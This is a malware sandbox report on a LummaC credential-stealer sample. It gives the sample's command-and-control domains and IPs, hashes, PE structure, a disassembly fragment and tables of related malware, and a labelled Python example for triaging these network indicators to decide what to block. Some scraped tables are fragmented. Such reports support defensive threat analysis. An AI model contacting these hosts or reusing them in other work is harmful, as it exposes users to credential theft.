https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
https://lev-tolstoi.com/(x8 | 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://steamcommunity.com/workshop/ | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
178.62.201.34 | immureprech.biz | European Union | 14061 | DIGITALOCEAN-ASNUS | false
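The tables above give three resolutions but mark every one of them "Malicious: false", and two of the three IPs belong to shared edge networks (Cloudflare, Akamai). Deciding which of these indicators is actually actionable takes a small amount of joining against the URL reputation column and the "context" tables further down the report (other sandboxed samples that contacted the same IP or domain). The following Python is an added example, not part of the Joe Sandbox report and not LummaC code: the records are transcribed from this report's URL, IP and context tables (a representative subset of the URL rows), while the list of shared-edge ASNs and the block-by-domain / monitor rules are this example's own assumptions.

```python
"""Network-indicator triage over the tables in this Joe Sandbox report.

Added example: not part of the report and not LummaC code. The row data is
transcribed from the report; SHARED_EDGE_ASNS and the blocking rules are
assumptions made here, not statements from the report.
"""
from collections import Counter
from urllib.parse import urlsplit

# Transcribed from the report's URL table: (url, "malicious" flag, reputation).
URL_ROWS = [
    ("https://broadcast.st.dl.eccdnx.com", False, "high"),
    ("https://store.steampowered.com/steam_refunds/", False, "high"),
    ("http://x1.c.lencr.org/0", False, "high"),
    ("https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900", False, "high"),
    ("https://lev-tolstoi.com/(x8", False, "unknown"),
    ("https://steamcommunity.com/workshop/", False, "high"),
]

# Transcribed from the report's IP table: (ip, domain, asn, asn name).
IP_ROWS = [
    ("104.21.66.86", "lev-tolstoi.com", 13335, "CLOUDFLARENETUS"),
    ("23.55.153.106", "steamcommunity.com", 20940, "AKAMAI-ASN1EU"),
    ("178.62.201.34", "immureprech.biz", 14061, "DIGITALOCEAN-ASNUS"),
]

# Transcribed from the report's IP context table: (ip, threat name of another sample).
IP_CONTEXT = [
    ("104.21.66.86", "FormBook"),
    ("23.55.153.106", "NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer"),
    ("23.55.153.106", "LummaC"), ("23.55.153.106", "LummaC"),
    ("23.55.153.106", "LummaC"), ("23.55.153.106", "LummaC"),
    ("23.55.153.106", "LummaC Stealer"), ("23.55.153.106", "LummaC Stealer"),
    ("23.55.153.106", "LummaC"), ("23.55.153.106", "LummaC"),
    ("23.55.153.106", "LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar"),
    ("178.62.201.34", "Tinba"),
]

# Transcribed from the report's domain context table: (domain, ip seen in another report).
DOMAIN_CONTEXT = [
    ("lev-tolstoi.com", "104.21.66.86"), ("lev-tolstoi.com", "172.67.157.254"),
    ("lev-tolstoi.com", "172.67.157.254"), ("lev-tolstoi.com", "172.67.157.254"),
    ("lev-tolstoi.com", "172.67.157.254"), ("lev-tolstoi.com", "104.21.66.86"),
    ("lev-tolstoi.com", "172.67.157.254"), ("lev-tolstoi.com", "172.67.157.254"),
    ("lev-tolstoi.com", "104.21.66.86"), ("lev-tolstoi.com", "104.21.66.86"),
    ("immureprech.biz", "104.131.68.180"),
]

# Assumption: ASNs of shared CDN/edge networks. One IP there fronts many
# unrelated tenants, so the IP alone is not a usable blocking indicator.
SHARED_EDGE_ASNS = {13335, 20940}


def candidate_c2_hosts(url_rows=URL_ROWS):
    """Hosts from the URL table whose reputation is anything but "high".

    The "malicious" column is "false" on every row, so it cannot separate the
    C2 from Steam and Let's Encrypt noise; the reputation column can.
    """
    return sorted({urlsplit(u).hostname for u, _mal, rep in url_rows if rep != "high"})


def family_hits(ip_context=IP_CONTEXT, family="LummaC"):
    """Per IP, how many other sandboxed samples contacting it were tagged `family`."""
    hits = Counter()
    for ip, threats in ip_context:
        hits[ip] += 0  # keep every IP in the result, even with zero hits
        if family in threats:
            hits[ip] += 1
    return dict(hits)


def indicator_plan(ip_rows=IP_ROWS, domain_context=DOMAIN_CONTEXT, url_rows=URL_ROWS):
    """Per domain: all IPs it resolved to across reports, and what to block.

    "monitor": high-reputation service abused for traffic, blocking breaks users.
    "domain":  C2 behind a shared edge; block the name, the IP is shared.
    "domain+ip": dedicated hosting, both indicators are actionable.
    """
    trusted = {urlsplit(u).hostname for u, _mal, rep in url_rows if rep == "high"}
    plan = {}
    for ip, domain, asn, _name in ip_rows:
        ips = {ip} | {ctx_ip for d, ctx_ip in domain_context if d == domain}
        if domain in trusted:
            block = "monitor"
        elif asn in SHARED_EDGE_ASNS:
            block = "domain"
        else:
            block = "domain+ip"
        plan[domain] = {"ips": sorted(ips), "block": block}
    return plan


if __name__ == "__main__":
    print("candidate C2 hosts:", candidate_c2_hosts())
    print("LummaC co-occurrence per IP:", family_hits())
    for domain, p in indicator_plan().items():
        print(f"{domain}: block by {p['block']}, ips={p['ips']}")
```

Two things fall out of running this over the report's own data. The Cloudflare IP of the C2 domain (104.21.66.86) has zero LummaC co-occurrence, its only other hit is a FormBook sample using a different tenant on the same edge, while the Akamai IP of steamcommunity.com co-occurs with ten LummaC reports; pivoting on IPs of shared infrastructure therefore points at the wrong indicator. Joining the domain context table instead yields both edge addresses lev-tolstoi.com has resolved to (104.21.66.86 and 172.67.157.254), which is what a DNS- or SNI-based block needs.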
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578702
Start date and time: 2024-12-20 07:03:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 8ZVMneG.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/0@13/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 20
• Number of non-executed functions: 54
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 8ZVMneG.exe, PID 2144, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:04:00 | API Interceptor | 14x Sleep call for process: 8ZVMneG.exe modified
Match (IP) | Associated sample name / URL | Detection | Threat name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer |
23.55.153.106 | ji2xlo1f.exe | malicious | LummaC |
23.55.153.106 | Armanivenntii_crypted_EASY.exe | malicious | LummaC |
23.55.153.106 | aqbjn3fl.exe | malicious | LummaC |
23.55.153.106 | aqbjn3fl.exe | malicious | LummaC |
23.55.153.106 | zq6a1iqg.exe | malicious | LummaC Stealer |
23.55.153.106 | v_dolg.exe | malicious | LummaC Stealer |
23.55.153.106 | cccc2.exe | malicious | LummaC |
23.55.153.106 | CompleteStudio.exe | malicious | LummaC |
23.55.153.106 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar |
178.62.201.34 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
Match (domain) | Associated sample name / URL | Detection | Threat name | Context (IP)
lev-tolstoi.com | ji2xlo1f.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | Armanivenntii_crypted_EASY.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | aqbjn3fl.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | aqbjn3fl.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | v_dolg.exe | malicious | LummaC Stealer | 172.67.157.254
lev-tolstoi.com | CompleteStudio.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 172.67.157.254
lev-tolstoi.com | alexshlu.exe | malicious | LummaC Stealer | 172.67.157.254
lev-tolstoi.com | 5_6253708004881862888.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | 1fxm3u0d.exe | malicious | LummaC | 104.21.66.86
immureprech.biz | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 104.131.68.180
                                                                                                                                                                                                                                                                ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                deafeninggeh.bizardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                steamcommunity.comqth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                                LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                                ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | la.bot.arm7.elf | malicious | Mirai | 172.234.241.24
 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 23.55.153.106
 | https://whtt.termlicari.ru/HnkNbg/ | malicious | Unknown | 2.16.168.119
 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 184.51.149.224
 | x86_32.nn.elf | malicious | Mirai, Okiru | 23.13.125.21
 | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS | 2.16.158.73
 | pM3fQBuTLy.exe | malicious | Vidar | 23.219.82.40
 | QIo3SytSZA.exe | malicious | Vidar | 23.44.203.15
 | R4qP4YM0QX.lnk | malicious | Unknown | 23.44.203.84
 | https://docs.google.com/forms/d/e/1FAIpQLSfpC7xVRv07m89Wl9UZXAneGiWD8iBvaXR4E1UxBoramir5pg/viewform?usp=header | malicious | HTMLPhisher | 172.233.62.38
DIGITALOCEAN-ASNUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 104.131.68.180
 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 178.62.201.34
 | ir_agent.exe | malicious | Metasploit | 157.230.10.115
 | https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655 | malicious | Unknown | 104.248.15.35
 | arm5.nn.elf | malicious | Mirai, Okiru | 138.69.143.193
 | mips.nn.elf | malicious | Mirai, Okiru | 64.225.24.108
 | mipsel.nn.elf | malicious | Mirai, Okiru | 68.183.178.14
 | arm7.nn.elf | malicious | Mirai, Okiru | 134.123.5.235
 | arm.nn.elf | malicious | Mirai, Okiru | 165.22.66.232
 | http://jonotarmot.com/dcs/ms_doc.html | malicious | HTMLPhisher | 134.209.237.210
CLOUDFLARENETUS | https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.com | malicious | HTMLPhisher | 104.21.49.70
 | Laurier Partners Proposal.eml | malicious | HTMLPhisher | 1.1.1.1
 | Dec 2024_12192924_Image.pdf | malicious | HTMLPhisher | 104.21.49.70
 | http://senalongley.com | malicious | Unknown | 104.21.96.47
 | https://f.io/nWWUxvn6 | malicious | HTMLPhisher |
                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.21.23.76
                                                                                                                                                                                                                                                                Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.11.54
                                                                                                                                                                                                                                                                https://pass-ga.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.215.242
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1
  file.exe | malicious | LummaC, Amadey, LummaC Stealer | 104.21.66.86, 23.55.153.106, 178.62.201.34
  file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 104.21.66.86, 23.55.153.106, 178.62.201.34
  hubus.exe | malicious | LummaC, PureLog Stealer, zgRAT | 104.21.66.86, 23.55.153.106, 178.62.201.34
  file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 104.21.66.86, 23.55.153.106, 178.62.201.34
  file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 104.21.66.86, 23.55.153.106, 178.62.201.34
  mirabon.msi | malicious | BruteRatel, Latrodectus | 104.21.66.86, 23.55.153.106, 178.62.201.34
  Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 104.21.66.86, 23.55.153.106, 178.62.201.34
  file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 104.21.66.86, 23.55.153.106, 178.62.201.34
  Svcrhpjadgyclc.cmd | malicious | DBatLoader | 104.21.66.86, 23.55.153.106, 178.62.201.34
  file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.21.66.86, 23.55.153.106, 178.62.201.34
No context
No created / dropped files found
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.808597434734726
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 8ZVMneG.exe
File size: 810'496 bytes
MD5: e8af4d0d0b47ac68d762b7f288ae8e6e
SHA1: 1d65f31526cc20ab41d6b1625d6674d7f13e326c
SHA256: b83449768e7af68867c8bc42b19ff012722d88ea66aef69df48661e63e0eb15e
SHA512: 80fad90314ff639f538a72c5e4ca2bf9ae52b9309caa7cd6f87d61791505bb3612b7f3190ab9b67348c5d71f4d29bb9d101e3f66d525eb9b5e2060a10b2d187a
SSDEEP: 24576:grtEhokkSG4bPWQ8C8z3zcB49CNPWQ8C8z3zcB49Cx:grGhokkSG4bPWQv8z3BYNPWQv8z3BYx
TLSH: 00050101B0408177D83B257A59F4EBBA9A3EF8700F7169DB57A81E79CB305C19B31B26
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x40c312
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp: 0x675EBBFA [Sun Dec 15 11:22:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 49250672a2ab6e8bdde5f4e329392300
Instruction
  call 00007FB960CCCB4Ah
  jmp 00007FB960CCC9B9h
  mov ecx, dword ptr [00432840h]
  push esi
  push edi
  mov edi, BB40E64Eh
  mov esi, FFFF0000h
  cmp ecx, edi
  je 00007FB960CCCB46h
  test esi, ecx
  jne 00007FB960CCCB68h
  call 00007FB960CCCB71h
  mov ecx, eax
  cmp ecx, edi
  jne 00007FB960CCCB49h
  mov ecx, BB40E64Fh
  jmp 00007FB960CCCB50h
  test esi, ecx
  jne 00007FB960CCCB4Ch
  or eax, 00004711h
  shl eax, 10h
  or ecx, eax
                                                                                                                                                                                                                                                                mov dword ptr [00432840h], ecx
                                                                                                                                                                                                                                                                not ecx
                                                                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                                                                mov dword ptr [00432880h], ecx
                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                sub esp, 14h
                                                                                                                                                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                xorps xmm0, xmm0
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                                call dword ptr [00430920h]
                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                call dword ptr [004308D4h]
                                                                                                                                                                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                call dword ptr [004308D0h]
                                                                                                                                                                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                call dword ptr [00430968h]
                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                xor eax, ecx
                                                                                                                                                                                                                                                                leave
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                mov eax, 00004000h
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                push 00433D60h
                                                                                                                                                                                                                                                                call dword ptr [00430940h]
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                push 00030000h
                                                                                                                                                                                                                                                                push 00010000h
                                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                                call 00007FB960CD3882h
                                                                                                                                                                                                                                                                add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30694 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0xe8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x38000 | 0x1c78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2cb78 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x28ff8 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x30860 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2646d | 0x26600 | 1cb7d0c9464ff9128ba37efaba3a0910 | False | 0.5475111970684039 | data | 6.556524326867543 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x28000 | 0x9bec | 0x9c00 | 878d385b80bbd700cbb2c5199eea38b8 | False | 0.43246694711538464 | data | 4.997055879664181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0x252c | 0x1600 | a99215662023900c738cb0230ba36a9a | False | 0.40873579545454547 | data | 4.766185881298672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CODE | 0x35000 | 0xef4 | 0x1000 | 540c3f0f86009f36fac5556f91f62d2a | False | 0.498291015625 | data | 5.7055594939540075 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.tls | 0x36000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x37000 | 0xe8 | 0x200 | a6b9bc0f9a7419955ff68c6924c37c42 | False | 0.306640625 | data | 2.344915704357875 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x38000 | 0x1c78 | 0x1e00 | d59be9c629a3697e2f595ead5e7c7371 | False | 0.7571614583333334 | data | 6.452492512245182 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x3a000 | 0x48600 | 0x48600 | 7129d7a296b0c9654e910d00f19fdcff | False | 1.0003407005613125 | data | 7.999309833911333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x83000 | 0x48600 | 0x48600 | 7129d7a296b0c9654e910d00f19fdcff | False | 1.0003407005613125 | data | 7.999309833911333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x37060 | 0x87 | XML 1.0 document, ASCII text | English | United States | 0.8222222222222222
DLL | Import
ADVAPI32.dll | CryptContextAddRef
